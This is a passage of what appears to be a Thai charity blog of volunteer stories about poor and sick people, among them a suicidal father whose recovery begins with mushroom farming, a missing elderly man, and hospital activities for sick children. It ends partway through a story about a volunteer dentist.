เห็ดนางฟ้าภูฏาน “ยาต้านเศร้า” ฉบับคนจน

เห็ดนางฟ้าภูฏาน “ยาต้านเศร้า” ฉบับคนจน

“วันนี้ล่ะ วันนี้เหมาะที่สุดสำหรับการฆ่าตัวตาย” ใครบางคนกระซิบอยู่ที่ข้างหู
ผมไม่รู้ว่าเป็นเสียงของใคร แต่เป็นประโยคคำสั่ง “ให้ผมฆ่าตัวตาย” ดังแว่วมาวันเว้นวัน
ผมต่อสู้กับเสียงได้บ้างไม่ได้บ้าง ยิ่งเห็นร่างกายที่นับวันยิ่งจะซูบผอมของลูกและเมีย
ผมก็ยิ่งอยากตายให้เร็วที่สุดเพื่อหยุดเรื่องราวความลำเค็ญตรงหน้า
ข้าวสารไม่มีกรอกหม้อ ฟ้านับวันยิ่งมืดมน ผมป่วยทั้งกายและใจไร้ทางต่อสู้
ไม่มีทั้งทุนทรัพย์และแรงใจไฟฝัน แม้กระทั่งความรู้สึกอยากหายใจเข้าหายใจออกก็ดูขัดขืน

“ผมผ่านการฆ่าตัวตายมาแล้ว 3 ครั้ง”
และเกือบทำสำเร็จในครั้งสุดท้ายพร้อมเชือกที่ถูกทำให้เป็นบ่วงเสร็จสรรพ
เหลือเพียงขยับร่างที่ไร้เรี่ยวแรงและชูคอให้แข็งเพื่อคล้องลงในบ่วงนั้น
วินาทีถัดไป…ผมจะไม่เป็นภาระใครอีก

ไม่รู้ว่าฟ้าดินกลั่นแกล้งหรืออย่างไร ลูกชายคนกลางเดินเข้ามาและจ้องมอง
ผมเลยต้องหยุดการตายเพื่อหนีปัญหาไว้เพียงเท่านี้..
และนี่คงไม่ใช่ทางออกของความทุกข์ยาก

หลังจากที่ผมป่วยด้วยโรคปลายประสาทกระดูกสันหลังแตก
วันหนึ่งในขณะกำลังเผาถ่านเพื่อเลี้ยงอีก 6 ปากท้อง
อยู่ๆผมก็เดินเสียหลักและล้มลง หลังจากนั้นก็ลุกขึ้นเดินไม่ได้อีกเลย
เมียกำลังตั้งท้องลูกคนที่สี่ เธอสู้งานหนักแบบไม่ปริปากบ่น จนผมรู้สึกละลายใจ

ยายทวดของเด็ก เลี้ยงหลานชายหญิงวัยกำลังซน ที่ยังช่วยเหลือตัวเองไม่ได้
งานเผาถ่าน เป็นสิ่งเดียวที่หญิงแก่วัยแปดสิบกว่าๆจะทำได้
ใจหนึ่งอยากตาย..อีกใจหนึ่งก็อยากให้เมียตายก่อน “ผมรักเธอมาก”
และไม่อยากให้เธอต้องเผชิญชีวิตที่ยากลำบากอย่างทุกวันนี้ ..
หากเธอตายไปซะ ความทุกข์ยากทั้งหมดนี้เขาจะขอรับไว้แต่เพียงผู้เดียว

หากแต่…

ทันทีที่ถุงเพาะเชื้อเห็ดนางฟ้าภูฏานเดินทางมาถึงบ้านของเรา
ผมรั้งน้ำตาแห่งความดีใจไว้ไม่ไหว แอบไปร้องไห้ไม่ให้ใครเห็นอยู่หลังบ้าน
ทันควันผมขว้างไม้ค้ำร่างทิ้ง มันไม่ใช่ตัวช่วยให้ชีวิตของผมดีขึ้นอีกต่อไป
“เห็ดนางฟ้าภูฏาน” ที่กองอยู่ตรงหน้าต่างหาก มันคือประตูสู่ความหวังใหม่อีกครั้ง

ผมกลับมาเดินอีกครั้ง..เดินทั้งที่ยังเดินไม่ค่อยได้ แต่ผมก็เดิน
ก้าวไปข้างหน้าแม้ว่าจะล้มลุกคลุกคลานไปบ้าง แต่ผมไม่อาย
เพราะนี่อาจเป็นโอกาสครั้งสุดท้าย..ที่จะทำให้ชีวิตผมห่างออกจากความยากจน
แม้เพียงน้อยนิด..ผมก็รู้สึกว่าทุกอย่างกำลังจะดีขึ้น

ผมว่าครอบครัวของเรามาไกลเกินฝัน หนึ่งวันก่อนที่ทีมอาสามาเยี่ยมจะนำเห็ดมาให้
ผมคุยกับเมียว่า เราจะรอดถ้าเราได้เห็ดมาเพาะเลี้ยงไว้ที่บ้านสักยี่สิบถุง
ยังไม่รู้ว่าจะขอจากใคร ..แต่ก็พอมีความหวังว่า “เห็ด” ที่ออกดอกออกผลทุกวัน
จะสามารถนำมาประกอบอาหาร ต้มยำทำแกงได้ ในยามขาดแคลน

เห็ดนางฟ้าภูฏานกว่า 600 ถุงทยอยลงจากรถ เสียงคำสั่งแว่ว แผ่วเบาที่เคยกังวาลอยู่ในสมอง
เลือนหายไปอย่างกับไม่เคยเกิดขึ้น ในวันที่เห็ดดอกแรกผลิบาน ผมเห็นรอยยิ้มของเมียลูกๆและยายทวด
ใจผมยิ้มตาม ผมในฐานะหัวหน้าครอบครัวทำให้ทุกคนยิ้มได้และอิ่มท้องอีกครั้ง

ผมไม่เคยรู้ตัวมาก่อนว่า เสียงของปีศาจร้ายที่คอยเฝ้าหลอกหลอนอยู่ข้างหูทั้งเช้าค่ำ
คืออาการของคนที่ป่วยทางจิตเป็นโรคซึมเศร้าขั้นรุนแรง และผมมีสิทธิฆ่าตัวตายได้ในทุกวินาที
และนั่นจะด้วยความรู้หรือไม่รู้ มีสติหรือไม่มีสติ ก็ตาม
โรคซึมเศร้าไม่เคยเลือกปฏิบัติ ไม่ว่าคนคนนั้นจะร่ำรวยหรือยากจน
หากแต่ว่าง่ายดาย มันดันแพ้คนใจสู้หลังชนฝาและประกายตาแห่งความหวังอันแรงกล้าของผม ..

Share Button

“พ่ออยู่ที่ไหน” ใจลูกก็อยู่ที่นั่น

p3

“พ่ออยู่ที่ไหน” ใจลูกก็อยู่ที่นั่น

คุณตานิตย์ สีหจักร์ อายุ 100 ปี หายตัวไปอย่างไร้ร่องรอยจากบริเวณหมู่บ้านหนองไทร
ตำบลไร่เก่า อำเภอสามร้อยยอด จังหวัดประจวบคีรีขันธ์ เมื่อวันที่ 25 กุมภาพันธ์ 2561

ลูกๆของตานิตย์ขอความช่วยเหลือมายังศูนย์ข้อมูลคนหาย ให้ช่วยประชาสัมพันธ์เรื่องราว
การหายตัวของตานิตย์ผ่านเพจศูนย์ข้อมูลคนหาย เพื่อหวังว่าใครอาจจะพบเจอคุณตาที่ไหนสักแห่ง
หลังจากนั้นทีมงานลงพื้นที่ติดตามหาคุณตาอย่างละเอียดในทุกตารางนิ้วของตำบลไร่เก่า
อำเภอสามร้อยยอด จังหวัดประจวบคีรีขันธ์ ไม่ว่าจะกี่ครั้งปาฏิหาริย์ก็ไม่เคยเข้าข้าง..

เป็นเวลากว่า 8 เดือนที่ลูกๆไม่เคยหยุดการค้นหา … ถึงแม้ว่าจะเจอเพียงไม้เท้าและรองเท้า
ความหวังในการได้พบพ่ออีกสักครั้งก็ไม่เคยล้มเลิก

“ฉันจะตามหาพ่อทั้งชีวิต” ป้านี ลูกสาวตานิตย์พูดอย่างหนักแน่น
“รู้ทั้งรู้ว่าพ่อมีอาการหลงลืม และต้องดูแลอย่างใกล้ชิดเป็นพิเศษ แต่สุดท้ายก็พลาดจนได้”
การหายตัวไปของพ่อจึงเป็นเรื่องค้างคาใจสำหรับชีวิตที่เหลือต่อจากนี้ของป้านี

ทุกซอกทุกมุมถูกค้นหาซ้ำแล้วซ้ำอีก ลูกๆทุกคนภาวนาขอเพียงได้รู้ว่าพ่ออยู่ตรงไหน
ไม่ว่าจะเป็นหรือตายก็อยากได้พบพ่ออีกครั้ง

“พ่ออยู่ที่ไหน” เป็นประโยคคำถามที่ป้านีและพี่ๆน้องๆทุกคนเฝ้าคิดวนเวียนอยู่ในหัว
ท่ามกลางความล้มเหลวผิดหวัง ป้านียังเหลือพื้นที่ให้กับความหวังเล็กๆในใจ

“อยากได้เลี้ยงดูพ่ออีกหน่อยก็ยังดี การหายไปแบบนี้ทำให้ทุกอย่างมันไม่สิ้นสุดเสียที เหมือนไม่ได้ดูแลกันในวาระสุดท้าย”

สิ่งสุดท้ายที่อยากร้องขอต่อโชคชะตา หากพบเจอกันแบบมีลมหายใจไม่ได้
ก็ขอได้เจอกระดูกของพ่อก็เพียงพอ …การรอคอยจะได้ถึงเวลาสิ้นสุดเสียที

“มีเพียงความหวังและกำลังใจที่มีให้กันเท่านั้น ที่ทำให้การรอของเรามีความหมาย รอจะได้พ่อคืนมาในสักวัน”

Share Button

“พ่อ” ผู้แบ่งปันในทุกโมงยามของชีวิต

p2

ลุงเจน เชื้อชุ่ม อายุ 65 ปี คุณพ่อวัยเกษียณที่ควงคู่ป้าหมวย มาหาเราที่โครงการแบ่งปันเมื่อ 7 ปีที่แล้ว
ตลอดระยะเวลาที่ผ่านมา เสื้อสีขาวมือสองกว่าพันตัวถูกนำไปย้อมใหม่จากเสื้อสีหม่นกลายเป็นสีสดใส
ทุกวันนี้ลุงหาเลี้ยงชีพด้วยการขับมอเตอร์ไซต์รับจ้างและออกเร่ขายเสื้อมัดย้อมตามตลาดนัด
ลุงเจนบอกว่า โครงการแบ่งปันช่วยคนไม่มีกิน ได้พอมีกินมีใช้ขึ้นมาบ้าง

เงินที่ได้ทุกบาทในแต่ละวันถูกแบ่งสรรคปันส่วนเป็นค่าใช้จ่ายจิปาถะในบ้าน
เป็นค่าขนมสำหรับหลานๆ ค่าน้ำค่าไฟ ค่าอาหารและค่าเช่าบ้านที่มีสมาชิกอยู่รวมกันกว่าสิบชีวิต

“ป่วยไม่ได้”
“ผ่าตัดไม่ได้”
“หยุดทำงานไม่ได้”
“พักไม่ได้”

คำพูดติดปากของลุงเวลาถูกถามว่าทำไมไม่ไปผ่าตัดรักษาโรคไส้เลื่อนที่เป็นมานานเสียที
ทั้งๆที่หมอย้ำว่า “ห้ามทำงานหนัก” แต่ลุงก็ทำเป็นไม่ได้ยินเพราะชีวิตจริง
หนี้สินที่แบกอยู่มันหนักหนากว่างานตรงหน้ายิ่งนัก

“พ่อ” ของลูก 6 คน และเป็นตาของหลานอีก 16 คน ไม่อาจทำเป็นมองไม่เห็นความลำบากของลูกหลานได้
งานอะไรที่พอทำให้ได้เงินมาบ้าง แกทำทุกอย่างเพื่อเลี้ยงปากท้องหลานๆให้พออิ่ม
ทุกวันนี้ป้าหมวยทำงานหนักไม่ได้เช่นกัน ด้วยสารพัดโรครุมเร้าทั้งโรคสมอง หัวใจ และความดัน

ลุงเจนจึงต้องเข้มแข็งไว้เพื่อเป็นหลักให้ทุกคนได้พึ่งพิง เช่นยามนี้เมื่อชีวิตของลูกๆพลั้งพลาด
และไร้หนทางไปต่อ
“บ้านเช่า” หลังนี้จึงอบอุ่นเสมอ แม้ว่าจะลำบากยากจน แต่ลุงก็ไม่เคยซ้ำเติมลูกๆ

“ที่เลี้ยงดูแลกันทุกวันนี้ก็หวังว่าสักวัน เมื่อลูกหลานเติบโตและพอมีชีวิตเลี้ยงดูตัวเองได้”
“พ่อ” คนนี้จะได้สบายใจและหมดห่วงสักที

Share Button

แด่ทุกหัวใจของพ่อที่ “ต่อสู้” เพื่อครอบครัว

p1

แด่ทุกหัวใจของพ่อที่ “ต่อสู้” เพื่อครอบครัว

หลังจากภรรยาตายจากด้วยโรคมะเร็งกระดูกระยะสุดท้าย หน้าที่ของความเป็นสามีก็จบสิ้นเช่นกัน
เหลือเพียงบทบาทหน้าที่ของความเป็น “พ่อ” ที่ภรรยาวางใจมอบไว้ให้แก่เขา

หากบ้านเราไม่ยากจนนัก ลูกชายคนเดียวคงไม่ต้องมีชีวิตเช่นนี้
เด็กชายอยากแบ่งเบาภาระครอบครัว จึงไปรับจ้างทำงานในโรงงาน ด้วยความประมาทพลั้งเผลอ
หรือโชคร้ายเข้าข้าง ในขณะที่เขากำลังถอดเสื้อพาดคอเป็นจังหวะเดียวกับที่สายพานดึงเสื้อ
แรงกระชากนั้นทำให้เขาขาดอากาศหายใจและกลายเป็นคนพิการป่วยติดเตียงในทันที

แรกๆยังมีแม่คอยดูแลลูกอย่างใกล้ชิด พ่อทำหน้าที่ออกทำงานรับจ้างหาเงินค่าใช้จ่ายรายวัน
จนเมื่ออยู่ๆภรรยาล้มป่วยและเสียชีวิตลง จึงเหลือเพียงพ่อที่ต้องรับผิดชอบดูแลลูกชายเพียงลำพัง
ใจของพ่อ..ไม่ได้คิดอะไรไปไกลมากไปกว่าการเลี้ยงดูลูกให้ดีที่สุด..เท่าที่จะทำได้
เพื่อให้ลูกมั่นใจว่า.. พ่อจะไม่ทิ้งลูกให้เป็นภาระของใคร
ไม่ใช่เพราะว่าพ่อคือพ่อ แต่เพราะเราคือส่วนหนึ่งของกันและกัน

และไม่ใช่เพียงโครงการอาสามาเยี่ยมเท่านั้น ที่จะได้สัมผัสความรู้สึกถึงความรักอันไม่มีเงื่อนไขของ “พ่อ”
ยังมีพ่อของลูกอีกหลายคนที่กำลังสู้ชีวิตเพื่อชีวิตที่ดีกว่าของลูก ขยันค้าขายเพื่อหารายได้อยู่ในโครงการแบ่งปัน
และยังมีลูกอีกหลายคนที่ทำทุกอย่างเพื่อที่จะได้พบเจอพ่ออีกสักครั้ง ติดต่อสัมพันธ์ชีวิตกันอยู่ในโครงการศูนย์ข้อมูลคนหาย

ทุกชีวิตที่ผ่านมาพบเจอกันในมูลนิธิกระจกเงา .. ต่างมีเรื่องราวสารพันให้ต้องแก้ไขและห่วงใยกัน
ไม่ว่าจะจนยาก ลำบาก ขาดแคลน เป็นหนี้สิน แต่ทุกคนก็พร้อมสู้ เพื่อคนที่ตัวเองรัก

เชื่อว่า อ้อมกอดของพ่อที่หนักแน่น และเงียบขรึมนั้นก็อบอุ่นไม่แพ้น้ำนมของแม่ที่หลั่งรินจากเลือดและน้ำตา

สุขสันต์วันพ่อ

Share Button

นิทานข้างเตียง

S__159989861

“เมื่อเสียงนิทานจากข้างเตียงดังขึ้น เสียงของความสุข รอยยิ้ม และเสียงหัวเราะของเด็ก ๆ ก็ดังขึ้นด้วยเช่นกัน”

เราเข้ามาในวันที่น้องลั้ลลา ต้องเข้าไปทำ MRI ในช่วงเย็น จึงถูกสั่งให้งดอาหารมาตั้งแต่ 7 โมงเช้า ทำให้วันนี้ดูอ่อนเพลียกว่าทุกวัน แม้ว่าน้องจะค่อนข้างกังวลกับการรอเข้าไปทำ MRI แต่ก็ยังตั้งใจฟังนิทานที่เราเล่า และตั้งใจทำหุ่นกระดาษจากตัวละครในนิทานที่เราเล่าให้ฟังอย่างเต็มที่

“กระดุ๊กกระดิ๊ก กระด๊อกกระแด๊ก” เสียงดิ้นของตั๊กแตน ที่มาของชื่อนิทานที่เรานำมาเล่าให้น้องฟัง เป็นเรื่องราวของยายเช้าที่ชอบหาวปากกว้าง จนตั๊กแตนบินเข้าปาก ยายเช้าจึงกินสัตว์ตัวอื่นเพื่อให้ตั๊กแตนหายไปแต่ก็ไม่เป็นผล

นอกจากนิทานเรื่องนี้จะสอนเรื่องสุขอนามัยให้กับเด็ก ๆ อย่างการหาวควรต้องปิดปากแล้ว อีกนัยหนึ่งยังสอนให้เรารู้จักการแก้ปัญหาอย่างถูกต้อง ควรแก้ปัญหาที่ต้นเหตุไม่ใช่ที่ปลายเหตุ และความเป็นเหตุเป็นผลที่เด็ก ๆ จะสามารถนำมาปรับใช้กับชีวิตประจำวันได้ด้วย

หลังจากนิทานจบลง แต่รอยยิ้ม และความสุขที่เรามอบให้ผ่านนิทานยังคงอยู่ ในโลกแห่งความจริง เราไม่มีพลังวิเศษใด ๆ อย่างในนิทาน แต่เราเชื่อว่าความทุกข์ ความเศร้า ความกังวลที่น้องกำลังเผชิญ สิ่งเหล่านั้นเราจะสามารถรักษาได้ด้วยกำลังใจ เราเพียงแต่หวังว่าวันหนึ่งน้องจะได้นอนฟังนิทานในห้องนอนไม่ใช่นิทานจากข้างเตียงพยาบาลเหมือนอย่างเคย

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

อาสา

36539156_1959585587424784_8743712210951340032_o

“เรามาทำอาสาเพื่อส่งต่อสิ่งดีๆให้กับผู้อื่น เราไม่จำเป็นต้องไปสร้างสิ่งยิ่งใหญ่ แค่เข้าไปสร้างความสุขในใจ และทำด้วยใจที่อยากให้ก็เพียงพอแล้ว แม้แบ่งเบาความทุกข์ในใจไม่ได้ทั้งหมด แต่ก็ภูมิใจที่อย่างน้อยก็ได้ช่วยเหลือ”

เด็กหลายคนที่ป่วย เขาก็ยังมีช่วงเวลาที่มีความสุข มีเสียงหัวเราะ มีสังคม เหมือนกับเด็กทั่วไป
เพียงแต่พื้นที่เหล่านั้นถูกจำกัดให้แคบลง แต่สำหรับเด็กป่วยติดเตียงแล้ว นอกจากความสุขที่ถูกจำกัดให้น้อยลงกว่าเดิมปฏิสัมพันธ์ต่อคนรอบข้างก็ยังถูกจำกัดตามลงไปด้วย

น้องฮุสเซน ก็เป็นเด็กป่วยติดเตียงอีกคนหนึ่งที่ขาดปฏิสัมพันธ์กับคนรอบข้าง น้องมักไม่ค่อยพูดจากับใคร และใช้เวลาส่วนใหญ่ไปกับโทรศัพท์ อาสาจึงเข้าไปพูดคุย ทำกิจกรรมร่วมกับน้องเพื่อให้น้องได้มีสังคม และได้ทำกิจกรรมอื่นๆ ที่นอกเหนือจากการจ้องแค่หน้าจอโทรศัพท์เพียงอย่างเดียว

ด้วยอาการป่วยของน้อง ทำให้ขาน้องไม่มีแรง เวลาห้อยขาลงจากเตียง น้องดูเจ็บมาก สิ่งที่ทำได้คือ ดึงหนังตัวเอง และใช้มือที่ดูอ่อนแรงนั้นช่วยพยุงขาของตัวเองขึ้นเท่านั้นการเลือกกิจกรรม จึงจำเป็นต้องอาศัยความสะดวกของน้องเป็นหลัก

เกมเศรษฐี และเกมบิงโก จึงเป็นสิ่งที่น้องเสนอ และเลือกที่จะเล่น ซึ่งพี่ๆอาสาก็เห็นว่าเป็นเกมที่สามารถจะช่วยพัฒนาความรู้ในเรื่องของการนับเลข และการจดจำของน้องให้ดีมากยิ่งขึ้น เนื่องจากน้องเข้ามารับการรักษาที่โรงพยาบาลตั้งแต่เด็กๆ ทำให้น้องไม่ได้เข้าโรงเรียน การเรียนรู้บางส่วนจึงขาดไป หลังจากทำกิจกกรมเราเห็นได้ชัดว่าน้องมีปฏิสัมพันธ์กับคนรอบข้างมากยิ่งขึ้น และยังสังเกตุเห็นว่าน้องสามารถนับเลขได้เร็วขึ้น สามารถใช้ตามองแล้วคิดในใจได้ โดยไม่ต้องใช้นิ้วนับแล้ว

“พี่จะมาอีกเมื่อไหร่ ผมอยากให้พี่มาอีก” เป็นคำถามสุดท้ายที่น้องฮุสเซนถามขึ้นก่อนอาสาจะกลับ

หลายอาทิตย์ที่ผ่านมา แค่ได้เห็นรอยยิ้มของเด็กๆ มันก็มีความสุขในใจมากแล้ว แต่สำหรับครั้งนี้
ยิ่งมีความสุขมากขึ้นไปอีก ทำให้เราเข้าใจ และเห็นอะไรหลายๆอย่างในชีวิตมากขึ้น

“ไม่ใช่แค่เราให้น้อง แต่น้องก็ให้เราเหมือนกัน”

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

ศิลปะการจัดวาง

“ป้าไม่เคยทำหรอกงานศิลปะพวกนี้ เคยทำแต่งานก่อสร้าง”

ผู้ป่วยคนหนึ่งกล่าว ขณะที่ตาเพ่งมองดอกไม้ประดิษฐ์จากไหมพรมหลากสีที่บรรจงทำขึ้นด้วยตัวเองทุกชิ้นอย่างตั้งใจ คุณป้าเสียบดอกไม้เหล่านั้นลงกระถางด้วยรอยยิ้มน้อยๆ ก่อนจะจัดวางไว้ที่หัวเตียงอย่างดี

งานศิลปะเหล่านี้จะช่วยให้พวกเขาได้แสดงออกถึงความคิด ความรู้สึกและประสบการณ์ผ่านทางงานศิลปะ รวมทั้งเป็นการสื่อถึงสิ่งที่อยู่ภายในจิตใจออกมาภายนอกโดยไม่ต้องใช้คําพูด

ผู้ป่วยหลายคนมีสภาวะที่ไม่สามารถบอกเล่าความรู้สึกนึกคิดออกมาเป็นคำพูดได้ หรือมีปัญหาเรื่องความสัมพันธ์กับผู้อื่น โดยเฉพาะผู้ใหญ่ หรือผู้สูงอายุบางคนอาจใช้เหตุผลในการดำเนินชีวิตมาตลอด จึงมีความรู้สึกเครียด และกดดันไม่น้อย

37021315_1977424718974204_431662501218746368_n

โครงการโรงพยาบาลมีสุขได้มีโอกาสเข้าไปทำกิจกรรมศิลปะบำบัดกับผู้ป่วยในหลายๆโรงพยาบาล
เป้าหมายของเราไม่ใช่ทำให้โรคมะเร็งหายไป หากแต่เป็นการช่วยเหลือให้คลี่คลายจากความทุกข์ ความกังวล

“บางคนอาจมองว่า ศิลปะคือการระบายออกทางอารมณ์ แต่แท้จริงแล้ว ศิลปะยังคืนความสวยงามกลับสู่ข้างในจิตใจเราด้วย”

เรื่องโดย : นางสาวปัญนัชยา บุญญเสธ
มหาวิทยาลัยรังสิต

Share Button

ชีวิตใหม่หลังความตาย

ชีวิตใหม่-new 


“ป้ากินข้าวกับเกลือ เพื่อให้แม่ กับพี่ได้กินข้าวกับปลา

ช่วงหลังแม่ป่วยมาก เคี้ยวอะไรไม่ค่อยได้
อยากให้เขาได้สารอาหาร เราก็ต้องยอม อดเอา”
 “มีเงินเก็บเท่าไหร่ สมบัติมีอะไร ป้าขนมาขายหมด
รถกระบะ ทีวีในบ้านก็ขาย หวังจะเอามารักษาพี่ กับแม่”

เป็นคำพูดของป้านัน หญิงชราที่อุทิศชีวิตดูแลแม่และพี่สาว ที่ป่วยหนัก
เธอว่า คุณค่า ความหมายของชีวิตทั้งหมดของเธอ คือการดูแลครอบครัว
ความจริงสังคมบ้านเรามีเรื่องราวเช่นนี้อยู่มาก
คนในบ้านป่วย คนที่แข็งแรงก็สู้จนหมดหน้าตัก สุดท้ายยื้อชีวิตใครไว้ไม่ได้
และต้องใช้ชีวิตหลังความตายของคนที่รัก แบบคน “หมดตัว”

ในบ้านที่ว่างเปล่า ป้านันอยู่กับร่องรอยของคนทั้งคู่ ที่ตอกย้ำให้คิดถึง
หล่อเลี้ยงตัวเองด้วยเบี้ยยังชีพคนชรา เดือนละ 600 บาท
ต้องเข้าออกโรงพยาบาล รักษาทั้งอาการป่วยกาย และใจ
“มีวันนึง หมอไม่ยอมให้ป้ากลับ ให้อยู่คุยกันก่อน กลัวป้าฆ่าตัวตาย”

จากอาการ “ป่วยใจ” ที่หมอห่วง เป็นที่มาของการตั้งคำถาม
ทำอย่างไร? จึงจะ “เยียวยา” ป้านัน ได้อย่าง “ยั่งยืน”
ทำอย่างไร? ให้ชีวิตของคนๆ หนึ่ง ที่ดูแลคนอื่นมาทั้งชีวิต ได้รับการดูแลบ้าง
แม้เป็นเพียงชีวิตน้อยๆ ของหญิงชราธรรมดาคนหนึ่งก็ตาม

ไอเดียส่งเห็ดนางฟ้าภูฏานให้ป้านันดูแลเพื่อให้คลายเศร้า
โดยให้เห็ดเหล่านั้น ดูแลป้านันไปด้วย จึงเกิดขึ้น

ทันทีที่ไอเดียนี้เริ่มขยับ ความช่วยเหลือจากคนที่รู้ข่าวก็ถาโถมเข้ามา
“ถ้าได้รู้ก่อน ไม่มีใครยอมปล่อยเพื่อนมนุษย์ตายไปต่อหน้าต่อตาหรอก”
เรื่องราวของเห็ดนางฟ้ากับป้านันเป็นสิ่งยืนยันข้อคิดนี้

หลังจากนั้นเห็ดนางฟ้า โดยการร่วมมือของหลากหลายผู้คนก็เริ่มทำหน้าที่ของมัน
เห็ดทำหน้าที่เยียวยาป้านันได้ทุกวัน ทำได้มากกว่าการเยี่ยมเยียนรายครั้ง/รายเดือน
เปลี่ยนชีวิตที่กำลังป่วยไข้จากความสูญเสีย เป็นความหวัง เป็นรายได้ เป็นอาชีพ

วันที่เชื้อเห็ดเดินทางไปถึง บรรยากาศของความหวัง
ก็ตลบอบอวลเต็มลานบ้านป้านันอีกครั้ง
ไม่นาน สมาชิกใหม่ของบ้าน ก็แทงยอด ออกดอกรายวัน
เฉลี่ยวันละ 1-5 กิโล ให้เก็บกินเก็บขาย
มีรายได้ประมาณวันละ 100-300 บาท

ค่ำวันหนึ่ง คืนที่ป้านันรู้สึกว่าพระจันทร์กำลังยิ้มให้ดวงดาว
เธอบอกกับแม่และพี่สาวบนท้องฟ้าว่า ไม่ต้องห่วงเธอแล้ว
เธอมีเห็ดไว้ดูแลคลายเหงา และเห็ดเหล่านี้ก็ดูแลชีวิตเธอด้วย

#เยี่ยมเยียนเพื่อเยียวยา #อาสามาเยี่ยม

Share Button

การเดินทางของความสุขในโลกใต้ท้องทะเลลึก

“เด็กทุกคนควรได้เล่นและเรียนรู้” วัยเด็กคือ วัยที่ควรได้รับโอกาสในการเรียนรู้เพื่อพัฒนาทักษะให้เหมาะสมกับช่วงอายุ แต่บางครั้งการเรียนรู้ก็ได้ถูกจำกัดด้วยปัจจัยหลายๆ อย่าง ไม่ว่าจะเป็น การเจ็บป่วย ปัญหาทางเศรษฐกิจในครอบครัว เป็นต้น โดยเฉพาะเด็กป่วยเวลาแห่งการเรียนรู้ของเขาจึงมีเงื่อนไข เมื่อเด็กคนหนึ่งเจ็บป่วยทำให้เศรษฐกิจในครัวเรือนเริ่มมีปัญหา การใช้เงินจึงต้องมีความระมัดระวัง เพื่อที่จะเก็บไว้เป็นค่ารักษาที่บางครั้งอาจกินเวลายาวนาน

แน่นอนว่าเมื่อเข้าสู่กระบวนการรักษาย่อมทำให้เกิดสภาวะความเครียด ความกดดันทั้งเด็กป่วยและพ่อแม่ผู้ปกครอง การใช้ชีวิตระหว่างการรักษาจึงมีบ้านกับโรงพยาบาลเท่านั้นที่แวะเวียนไปอย่างต่อเนื่อง โรงเรียน สนามเด็กเล่น ที่ที่เด็กควรอยู่เพื่อการเรียนรู้ พบปะสังสรรค์ พัฒนาด้านร่างกายและจิตใจนั้นจึงถูกลดบทบาทลงมามุ่งในการรักษาเป็นหลัก

ดังนั้นกิจกรรมพาเด็กป่วยและครอบครัวเที่ยวชม Bangkok Sealife Ocean World ที่เด็ก ๆ จะได้พบกับสัตว์น้ำใต้ทะเลมากกว่า 6,000 ตัวเสมือนการท่องอยู่ใต้ทะเลลึก เป็นกิจกรรมที่จะช่วยบำบัดความทุกข์และเติมความสุขให้มีพลัง กำลังใจ ในการใช้ชีวิต พี่เจ้าหน้าที่โรงพยาบาลได้กล่าวว่า

“ การพาเด็กไปทำกิจกรรมนอกสถานที่ เป็นการรักษาจิตใจเด็ก ความเจ็บป่วยทางกายก็มีผลกระทบต่อสภาพจิตใจของคนเราเหมือนกัน เวลาเราป่วย เราก็รู้ว่ามันไม่มีความสุข เด็ก ๆ ก็เช่นกัน แต่พอได้รับความสุขทางจิตใจ มันก็เหมือนยาเยียวยาจิตใจ สภาพร่างกายที่มันอ่อนแอมันก็ดีขึ้น”

“ถึงแม้ว่าเขาจะเป็นเด็กป่วย แต่ตัวเองก็ยังมีความสุขได้ เราจึงอยากเป็นส่วนหนึ่งในการที่จะช่วยให้เด็ก ๆ ได้มีความสุขในแต่ละวันที่เค้ายังมีชีวิต อยากเป็นส่วนหนึ่งที่ทำให้เด็กมีกำลังใจ โดยการมอบความสุขให้กับเด็กๆ”

IMG-9426

การมาเที่ยว Bangkok sealife ocean world เหมือนเป็นความฝันอีกอย่างหนึ่งที่เด็กหลาย ๆ คน เคยวาดฝันและจินตนาการเอาไว้ ภาพบรรยากาศแห่งความสุขได้ถูกบรรจุและรวบรวมไว้ในความทรงจำที่ดีของเด็กป่วย ตามคำบอกเล่าจากผู้ปกครองว่า “ดีใจ และตื่นเต้นมาก ๆ ครั้งนี้เป็นครั้งแรกในชีวิตเค้าที่ได้มีโอกาสมาเที่ยวในสถานที่ดี ๆ แบบนี้ เด็ก ๆ เค้ามีความสุขมาก ดีใจที่น้องเค้าได้มาเห็นของจริง จากเมื่อก่อนได้ดูแค่ในทีวี”

IMG-9424

“ป่วยแต่ก็สามารถมีความสุขได้” ความสุขของเด็กป่วย ไม่ได้ถูกจำกัดอยู่ที่สภาพร่างกาย เด็กป่วยยังคงมีความเป็นเด็ก ต้องการที่จะเรียนรู้ และสนใจในสิ่งต่าง ๆ รอบตัว การที่ได้ออกไปเที่ยวกับครอบครัวเป็นการเพิ่มความทรงจำที่ดีอย่างหนึ่ง เพราะเวลา ณ ขณะนั้น เป็นการหยุดความเจ็บปวดทางร่างกายไว้ และใช้ชีวิตเหมือนเด็กปกติทั่วไป เสียงหัวเราะและรอยยิ้มที่เกิดขึ้นระหว่างคนในครอบครัว จึงเป็นสัญญาณที่ย้ำเตือนว่า “ถึงกายป่วย ถ้าใจยังเข้มแข็ง เราก็สามารถมีความสุขได้”

IMG-9428

เรื่องโดย : นางสาวภัทราภรณ์ พุ่มพวงเกียรติ
มหาวิทยาลัยมหาสารคาม

Share Button

หมอฟัน(อาสา)มีสุข

28309893_10155909969657110_940364433_o

ทันทีที่โครงการโรงพยาบาลมีสุข เปิดรับสมัคร “อาสามีสุข” เพื่อเป็นอาสาสมัครประจำโรงพยาบาล กำหนดให้อาสาทำกิจกรรมลดทุกข์ สร้างสุขให้เด็กป่วยอย่างน้อยสัปดาห์ละหนึ่งวัน ต่อเนื่องนาน 2 เดือน ทันตแพทย์หญิงสุพัฒตรา โต๊ะชูดี ทันตแพทย์ประจำโรงพยาบาลธนบุรี 2 หรือที่เด็กๆ ชอบเรียกกันว่า “พี่อ๊อด” ก็ลงชื่อสมัครเข้าร่วมโครงการทันที โดยเป็นอาสามีสุขประจำโรงพยาบาลราชวิถี และใช้เวลาทุกวันพุธ ซึ่งตรงกับวันหยุดของเธอในการทำกิจกรรมร่วมกับเด็กป่วย

